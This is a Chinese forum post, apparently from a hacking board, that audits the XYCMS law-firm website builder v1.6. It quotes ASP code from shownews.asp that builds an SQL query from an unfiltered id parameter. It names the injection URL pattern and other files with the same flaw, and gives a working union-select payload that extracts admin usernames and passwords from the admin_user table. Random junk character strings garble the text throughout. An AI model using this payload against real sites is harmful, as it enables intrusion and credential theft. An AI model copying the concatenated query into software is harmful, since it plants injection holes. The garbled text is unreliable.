前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似4 S! W5 J" i$ [( n4 z
9 U& a3 K# G" u. J) E/ q- |淫荡分割线
N2 |, T7 {+ k8 n/ N9 e! [--------------------------------------------------------! \5 f' e: k& W" s7 k
- f8 d) Y4 E d5 V审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)7 A* l" v+ j8 I
源码地址:http://down.chinaz.com/soft/29233.htm
+ f: d) s! _% _, m" X1 P0 t
- _$ K/ a9 u% p7 z) R) V漏洞文件:shownews.asp- [1 { R7 `* r5 b/ M
漏洞代码:7-13行
6 Y/ i- }8 @2 k% [
7 @5 @* R5 W& m
4 v3 z! A# O# K* c<% ( z C8 s% ]& P) ~1 X
id=request.QueryString("id")
+ C+ |$ q" X0 T6 I
/ E) h# e2 M+ p+ O/ Q9 sset snews=server.createobject("adodb.recordset")
) c" b1 V U' C) z4 d6 [3 j3 F2 a% Gexec="select * from [news] where id="&id
: v- Y2 W# M; y4 Msnews.open exec,conn,1,1
3 E$ E+ r8 F1 [ K# f5 P+ f%>
; ]8 [1 N( R8 y7 m. g! t1 W0 ?
3 Z+ Y3 {1 n$ D( F3 d7 w' ]& @ , S% ^, j7 B7 M% a# h0 D
什么过滤都没有 直造成注入
, a# x. F+ e) C/ m
+ N- x9 f7 N) \5 Z" r0 Y# Y( ]* V+ }注入点:http://127.0.0.1:99/shownews.asp?id=xx! y# A& q2 s! q8 B
7 S8 N) M/ g4 W8 K! q& M
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
* K5 w# D2 L: ]- d. N& L6 B0 Z$ `' L
4 B+ }1 ~- {) L- E6 v$ d$ X
8 S' B" q# M \4 oexp: union select 1,admin,password,4,5,7 from admin_user( x4 f3 }: C: h8 U
* Y! e: k, U% E/ h3 G! _# W |